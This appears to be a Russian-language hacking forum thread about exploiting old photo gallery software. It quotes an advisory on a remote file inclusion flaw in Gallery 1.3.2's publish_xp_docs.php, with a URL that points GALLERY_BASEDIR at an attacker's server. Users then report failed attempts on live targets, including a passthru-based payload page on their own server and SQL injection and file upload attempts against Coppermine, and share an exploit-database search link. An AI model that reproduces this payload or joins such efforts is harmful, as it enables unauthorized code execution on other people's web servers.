Уязвимость обнаружена в 1.3.2. И поэтому тебе это врятли поможет но навсякий случай попробуй.
Gallery – система управления изображениями от http://gallery.sourceforge.net.

Gallery v1.3.2 содержит новую особенность, которая позволяет пользователям публиковать изображения Web сайте, используя систему публикации Windows XP Publishing subsystem. Обнаруженная уязвимость в этой особенности (а точнее в сценарии publish_xp_docs.php) позволяет злонамеренному пользователю обработать URL таким образом, что он может получить удаленный доступ к Web серверу с привилегиями Web сервера.

Пример:

http://hostname/gallery/publish_xp_docs.php?
GALLERY_BASEDIR=http://your.evil.server.tdl/

такая тема - какие версии только не пробовал, резальт один:

Fatal error: Call to undefined function: _() in /home/users/gallery/htdocs/publish_xp_docs.php on line 28

это типа пат4енная, или на своей стороне нужно по-особому index.php сосотавить (у меня простой passthru был)???

Это версия более новаю и у нее пока багов не нашли

Ой блин да простят меня все за то что я такое старьё поднял но у меня тут вопрос ребром встал а баги как таковой не нашол интересует Coppermine Photo Gallery v1.3.2 перерыл всё а толком ничего нету галлерея вроде не патченная но файла publish_xp_docs.php и xp_publish.php нема =(

http://www.milw0rm.com/search.php?dong=Coppermine

пробовал?

__________________

Ага не помогает

Из разрешённых на заливку файлов только формат .jpg остальное всё в топке (запрещено) sql иньекция не катит =(

сплойт себя немного странно повёл но результат 1 файла с которым работает сплойт нет на серваке =(

Также к слову там установленна но по уязвимости этого вообще нечего не нашол толком =(